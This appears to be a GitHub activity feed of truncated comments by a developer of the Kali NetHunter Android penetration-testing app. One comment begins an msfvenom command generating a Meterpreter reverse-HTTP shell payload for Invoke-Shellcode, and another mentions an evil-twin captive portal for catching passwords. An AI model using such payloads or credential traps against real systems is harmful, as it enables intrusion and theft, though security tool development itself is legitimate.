binkybear
binkybear
It's possible but not built in script. You wouldn't need a ycable since it's possible for a android device to emulate a usb mass storage (think of drivedroid). I'm not...
@thesle3p - Can you send me an example file you are trying to load so I can test fixes. If you could, please email it to [email protected]. I also think...
@mubix - After looking at Invoke-shellcode it still looks like we can pass -Shellcode. So we can generate the shellcode with msfvenom from code: ``` bash msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.1.12...
Updated with progress dialogue. Updated APK for testing: https://transfer.sh/YInuc/nethunter-app-release.apk
I believe we plan on integrating more with empire in the future. If you want a "generic" http to powershell I think that should be separate from this attack and...
@simonpunk - Well we can easily drop the shellcode generation or maybe generate it after the attack is launched. I could also enable --smallest in msfvenom although I'm not sure...
This is a good idea and one I've looked at before. Hope to add it soon.
1. Could you explain 1 more 2. Would be easy in duckhunter there are some example presets which are stored here: https://github.com/offensive-security/nethunter-app/tree/master/assets/nh_files/duckyscripts and menu options are here: https://github.com/offensive-security/nethunter-app/blob/master/src/com/offsec/nethunter/DuckHunterFragment.java#L425. It would...
@simonpunk - Its def possible to do it (set up an evil twin/captive portal) to catch login and passwords. However, it's not something mana does out of the box so...
Added paste icon. Only thing left is pgup/down. https://github.com/binkybear/Android-Terminal-Emulator/commit/42e547279e042903dd025af5e25b67cf26c8fef4